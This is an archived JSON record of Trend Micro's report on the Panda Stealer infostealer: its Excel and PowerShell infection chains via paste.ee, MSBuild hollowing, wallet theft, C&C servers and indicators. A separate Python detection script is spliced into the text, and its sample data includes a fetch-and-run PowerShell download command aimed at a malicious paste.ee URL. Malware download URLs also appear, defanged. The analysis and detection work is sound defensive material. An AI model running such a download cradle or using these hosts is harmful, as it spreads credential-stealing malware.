{
	"id": "976cc83a-edc8-455f-8515-152e3c661de4",
	"created_at": "2026-04-06T00:10:08.880255Z",
	"updated_at": "2026-04-10T03:20:26.688659Z",
	"deleted_at": null,
	"sha1_hash": "464c9eb752ef027101f0c369855a80eeb92c2c87",
	"title": "New Panda Stealer Targets Cryptocurrency Wallets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 636867,
	"plain_text": "New Panda Stealer Targets Cryptocurrency Wallets\r\nBy: Monte de Jesus, Paul Pajares May 04, 2021 Read time: 4 min (1077 words)\r\nPublished: 2021-05-04 · Archived: 2026-04-05 15:52:35 UTC\r\nIn early April, we observed a new information stealer called Panda Stealer being delivered via spam emails. Based on Trend Micro's telemetry, the United States, Australia, Japan, and Germany were among the most affected countries during a recent spam wave. A modified fork of the malware Collector Stealer, Panda Stealer also uses a fileless approach in its distribution to evade detection.\r\nInfection chains\r\nPanda Stealer is deployed through spam emails posing as business quote requests to lure unwary victims into opening malicious Excel files. We have identified two infection chains. In the first, an .XLSM attachment contains macros that download a loader (Figure 1); the loader then downloads and executes the main stealer.\r\nFigure 1. The macro script that downloads the Panda Stealer loader\r\nThe second infection chain involves an attached .XLS file containing an Excel formula that runs a PowerShell command (Figure 2) to access paste.ee, a Pastebin alternative, which in turn retrieves a second, encoded PowerShell command (Figure 3).\r\nFigure 2. Excel formula accessing a paste.ee URL via a PowerShell command\r\nhttps://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nPage 1 of 8\r\nFigure 3. Encoded and decoded PowerShell script from a paste.ee URL\r\nDecoding these PowerShell scripts revealed that they access further paste.ee URLs, which makes staging fileless payloads simple: each stage is fetched and run from memory rather than written to disk. The Visual Basic CallByName function is used to invoke the loading of a .NET assembly in memory from a paste.ee URL. The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces its code with the payload: the hex-encoded Panda Stealer binary fetched from another paste.ee URL.\r\nOnce installed, Panda Stealer can collect details such as private keys and records of past transactions from the victim's various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Beyond cryptocurrency wallets, it can steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It is also capable of taking screenshots of the infected computer and exfiltrating browser data such as cookies, passwords, and card details.\r\nIt writes the stolen information to files with randomized names under the %Temp% folder, which are then sent to a command-and-control (C\u0026C) server. Further analysis of its C\u0026C server leads to a login page for \"熊猫Stealer,\" which translates to \"Panda Stealer\" (Figure 4); more domains have been identified with the same login page (Figure 5). Another 14 victims were discovered from the logs of one of these servers.\r\nFigure 4. Possible login page for Panda Stealer\r\nFigure 5. Other login pages called \"熊猫Stealer\"\r\nAnother 264 files similar to Panda Stealer were found on VirusTotal. More than 140 C\u0026C servers (Table 1) and over 10 download sites were used by these samples.\r\n
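As an added example (not code from the Trend Micro report, and not the malware's own code), the following Python turns the chain described above into detection logic: it flags an Office application spawning a script host, a script host reaching paste.ee or carrying an encoded command, and MSBuild.exe started by a script host (the hollowing target), and it re-fangs the report's command-and-control and paste.ee indicators so they can be matched against proxy log lines. The Sysmon-style event field names, the file paths and the log lines are constructed for the demo; only the indicators come from the report.

```python
# Added example, not code from the Trend Micro report. Detection logic for the
# Panda Stealer chain over constructed Sysmon-style process events and proxy
# log lines; field names, paths and log lines are assumptions made for the demo.

BS = chr(92)  # a single backslash, kept out of the string literals below

def win(*parts):
    return BS.join(parts)  # build a Windows path from its components

# Indicators exactly as the report lists them (defanged), from Table 1 and the IoC list.
DEFANGED_IOCS = [
    'hxxp://cocojambo.collector-steal.ga/collect.php',
    'hxxp://f0522235.xsph.ru/collect.php',
    'hxxp://guarantte.xyz/collect.php',
    'hxxp://prtboss.com/collect[.]php',
    'hxxps://paste.ee/r/pLpR9',
    'hxxps://paste.ee/r/Qsowz',
    'hxxps://paste.ee/r/6toiY',
]
OFFICE_APPS = {'excel.exe', 'winword.exe', 'powerpnt.exe'}
SCRIPT_HOSTS = {'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe'}

def refang(ioc):
    # Turn a defanged indicator (hxxp, [.]) back into a matchable lower-case URL.
    url = ioc.strip().replace('[.]', '.')
    if url.startswith('hxxps://'):
        url = 'https://' + url[len('hxxps://'):]
    elif url.startswith('hxxp://'):
        url = 'http://' + url[len('hxxp://'):]
    return url.lower()

IOC_URLS = {refang(u) for u in DEFANGED_IOCS}
IOC_HOSTS = {u.split('/')[2] for u in IOC_URLS}

def image_name(path):
    # Lower-case file name of a Windows image path (back or forward slashes).
    return path.replace(BS, '/').rsplit('/', 1)[-1].lower()

def classify_process_event(event):
    # Return the names of the rules a process-creation event trips (possibly none).
    child = image_name(event['image'])
    parent = image_name(event['parent_image'])
    cmd = event.get('command_line', '').lower()
    hits = []
    # Chain 2: an Excel formula launches PowerShell straight from the workbook.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append('office_spawns_script_host')
    # Staging: the script host reaches paste.ee or carries an encoded command.
    if child in SCRIPT_HOSTS and ('paste.ee' in cmd or ' -enc' in cmd or 'frombase64string' in cmd):
        hits.append('script_host_stage_download')
    # Loader: MSBuild.exe started by a script host is the hollowing target the report describes.
    if child == 'msbuild.exe' and parent in (SCRIPT_HOSTS | OFFICE_APPS):
        hits.append('msbuild_spawned_by_script_host')
    return hits

def scan_proxy_line(line):
    # Match one constructed proxy line (timestamp client method url status) against the IoCs.
    parts = line.split()
    if len(parts) < 4 or '://' not in parts[3]:
        return None
    url = parts[3].lower()
    if url in IOC_URLS:
        return 'ioc_url_match'
    if url.split('/')[2] in IOC_HOSTS:
        return 'ioc_host_match'
    # The panel endpoint name alone is a weak signal; surface it at low confidence only.
    if url.endswith('/collect.php'):
        return 'collect_php_endpoint'
    return None

# Constructed sample data: the two stages of the chain plus one benign event.
SAMPLE_EVENTS = [
    {'parent_image': win('C:', 'Program Files', 'Microsoft Office', 'root', 'Office16', 'EXCEL.EXE'),
     'image': win('C:', 'Windows', 'System32', 'WindowsPowerShell', 'v1.0', 'powershell.exe'),
     'command_line': 'powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString(https://paste.ee/r/pLpR9)'},
    {'parent_image': win('C:', 'Windows', 'System32', 'WindowsPowerShell', 'v1.0', 'powershell.exe'),
     'image': win('C:', 'Windows', 'Microsoft.NET', 'Framework', 'v4.0.30319', 'MSBuild.exe'),
     'command_line': 'MSBuild.exe'},
    {'parent_image': win('C:', 'Windows', 'explorer.exe'),
     'image': win('C:', 'Program Files', 'Microsoft Office', 'root', 'Office16', 'EXCEL.EXE'),
     'command_line': 'EXCEL.EXE ' + win('C:', 'Users', 'victim', 'Downloads', 'quote-request.xls')},
]
SAMPLE_PROXY = [
    '2021-04-06T09:12:41Z 10.0.0.25 GET https://paste.ee/r/pLpR9 200',
    '2021-04-06T09:13:05Z 10.0.0.25 POST http://cocojambo.collector-steal.ga/collect.php 200',
    '2021-04-06T09:14:10Z 10.0.0.31 GET https://www.example.com/index.html 200',
    '2021-04-06T09:15:00Z 10.0.0.31 POST http://unknown-host.test/collect.php 200',
]

def run_demo():
    # Run both detectors over the constructed samples and return the verdicts.
    return {
        'process': [classify_process_event(e) for e in SAMPLE_EVENTS],
        'proxy': [scan_proxy_line(l) for l in SAMPLE_PROXY],
    }

if __name__ == '__main__':
    print(run_demo())
```

Run it directly to print the verdicts for the constructed samples. The bare collect.php match is deliberately reported at lower confidence: the same panel endpoint name appears across the Collector Stealer family in Table 1, so on its own it is a hunting lead rather than a confirmed hit, whereas a parent-child pair such as EXCEL.EXE spawning powershell.exe, or powershell.exe spawning MSBuild.exe, is worth alerting on in most enterprise environments.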
Some of the download sites were Discord URLs hosting files with names such as \"build.exe,\" which indicates that threat actors may be using Discord to share the Panda Stealer build. Some of the download sites are listed below:\r\nhxxp://23.92.213.108/po/tai1.exe\r\nhxxp://83.220.175.66/build.exe\r\nhxxps://bingoroll2.net/chirik.exe\r\nhxxp://bingoroll2.net/chirik.exe\r\nhxxp://cryptojora.club/sosi.exe\r\nhxxp://f0522235.xsph.ru/build.exe\r\nhxxp://f0522235.xsph.ru/build2.exe\r\nhxxp://micromagican.com/chirik.exe\r\nhxxp://repairyou.com/henry.exe\r\nhxxp://traps.ml/build.exe\r\nhxxp://tydaynsosi.ru/loader/23/1kwo.txt\r\nhxxp://tydaynsosi.ru/loader/23/1tgk.txt\r\nC\u0026C server | Occurrences per unique file\r\nhxxp://cocojambo.collector-steal.ga/collect.php | 73\r\nhxxp://f0522235.xsph.ru/collect.php | 4\r\nhxxp://guarantte.xyz/collect.php | 3\r\nhxxp://f0527189.xsph.ru/collect.php | 3\r\nhxxp://f0527703.xsph.ru/collect.php | 2\r\nhxxp://j1145058.myjino.ru/collect.php | 2\r\nhxxp://1wftyu121cwr24v3hswa1234g.tk/collect.php | 2\r\nhxxp://f0527262.xsph.ru/collect.php | 2\r\nhxxp://steammd0.beget.tech/collect.php | 2\r\nTable 1. The top C\u0026C servers used by files that are similar to Panda Stealer\r\nAttribution\r\nBased on one of the active C\u0026C servers (Figure 6), we have identified an IP address that we believe was used by the threat actor. We believe that this address is assigned to a virtual private server (VPS) rented from Shock Hosting, which the actor infected for testing purposes. The VPS may have been paid for with cryptocurrency to avoid being traced, and the actor used the online crypting service Cassandra Crypter from it (Figure 7). We have reported this to Shock Hosting, and they confirmed that the server assigned to this IP address has been suspended.\r\nAnother infected machine was discovered with a history of visiting a Google Drive link that is also mentioned in a discussion about an AZORult log extractor on an underground forum. The same link and unique cookie were observed in both the log dumps and the forum post, so the user who posted on the forum must also have access to that log file.\r\nFigure 6. Control panel of an active C\u0026C server\r\nFigure 7. Screenshot of the threat actor using Cassandra Crypter\r\nSimilarities with other stealers\r\nPanda Stealer was found to be a variant of Collector Stealer, which has been sold on some underground forums and a Telegram channel (Figure 8). Collector Stealer has since been cracked by a Russian threat actor called NCP, also known as su1c1de. Comparing the compiled executables of the cracked Collector Stealer and Panda Stealer shows that the two behave similarly but have different C\u0026C URLs, build tags, and execution folders (Figure 9). Like Panda Stealer, Collector Stealer exfiltrates information such as cookies, login data, and web data from a compromised computer, storing them in an SQLite3 database. It also covers its tracks by deleting its stolen files and activity logs after execution (Figure 10).\r\nFigure 8. Telegram channel that sells Collector Stealer\r\nFigure 9. The compiled executable of the cracked Collector Stealer (left) and the Panda Stealer sample (right)\r\nFigure 10. The activity logs of an earlier Collector Stealer version (left) and Panda Stealer (right)\r\nBecause the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C\u0026C panel. Threat actors may also augment their malware campaigns with specific features from Collector Stealer. We have also discovered that Panda Stealer has an infection chain that uses the same fileless distribution method as the \"Fair\" variant of Phobos ransomware to carry out memory-based attacks, making it more difficult for security tools to spot.\r\nProtect your network from spammed threats\r\nTo protect systems against fileless threats that use spam emails as vectors, enterprises can use Trend Micro endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security. Both solutions protect users and businesses from threats by detecting malicious files and spammed messages and blocking all related malicious URLs.\r\nIndicators of compromise\r\nNumerous files, domains, and IP addresses were involved in this attack. Trend Micro has provided detection for the malicious artifacts found in this investigation. A partial list of the notable items is detailed below:\r\nSHA256 | Trend Micro Detection Name\r\n6413be289cf38c2462bd8c6b8bad47f8d953f399e1ccba30126a1fb70d13a733 | Trojan.X97M.PANDASTEAL.AA\r\n4ff1f8a052addbc5a0388dfa7f32cc493d7947c43dc7096baa070bfc4ae0a14e | Trojan.Win32.PHOBOS.B\r\n0a9f466fb5526fd512dd48c3ba9551dbd342bdb314a87d5c6f730d3c80041da6 | TrojanSpy.X97M.PANDASTEAL.THDABBA\r\n05d38ac5460418b0aa813fc8c582ee5be42be192de10d188332901157c54287c | TrojanSpy.Win32.PANDASTEAL.THDABBA\r\n1efa74e72060865ff07bda90c4f5d0c470dd20198de7144960c88cef248c4457 | TrojanSpy.Win32.PANDASTEAL.THDABBA\r\nURLs\r\nhxxp://23.92.213.108/po/aXSz3[.]exe\r\nhxxp://23.92.213.108/po/tai1[.]exe\r\nhxxp://prtboss.com/collect[.]php\r\nhxxp://biscosuae[.]com\r\nhxxp://prtanet[.]com\r\nhxxps://paste.ee/r/pLpR9\r\nhxxps://paste.ee/r/Qsowz\r\nhxxps://paste.ee/r/6toiY\r\nhxxp://cocojambo.collector-steal.ga/collect.php\r\nhxxp://f0522235.xsph.ru/collect.php\r\nhxxp://guarantte.xyz/collect.php\r\nhxxp://f0527189.xsph.ru/collect.php\r\nhxxp://f0527703.xsph.ru/collect.php\r\nhxxp://j1145058.myjino.ru/collect.php\r\nhxxp://1wftyu121cwr24v3hswa1234g.tk/collect.php\r\nhxxp://f0527262.xsph.ru/collect.php\r\nSource: https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html"
	],
	"report_names": [
		"new-panda-stealer-targets-cryptocurrency-wallets-.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434208,
	"ts_updated_at": 1775791226,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/464c9eb752ef027101f0c369855a80eeb92c2c87.pdf",
		"text": "https://archive.orkl.eu/464c9eb752ef027101f0c369855a80eeb92c2c87.txt",
		"img": "https://archive.orkl.eu/464c9eb752ef027101f0c369855a80eeb92c2c87.jpg"
	}
}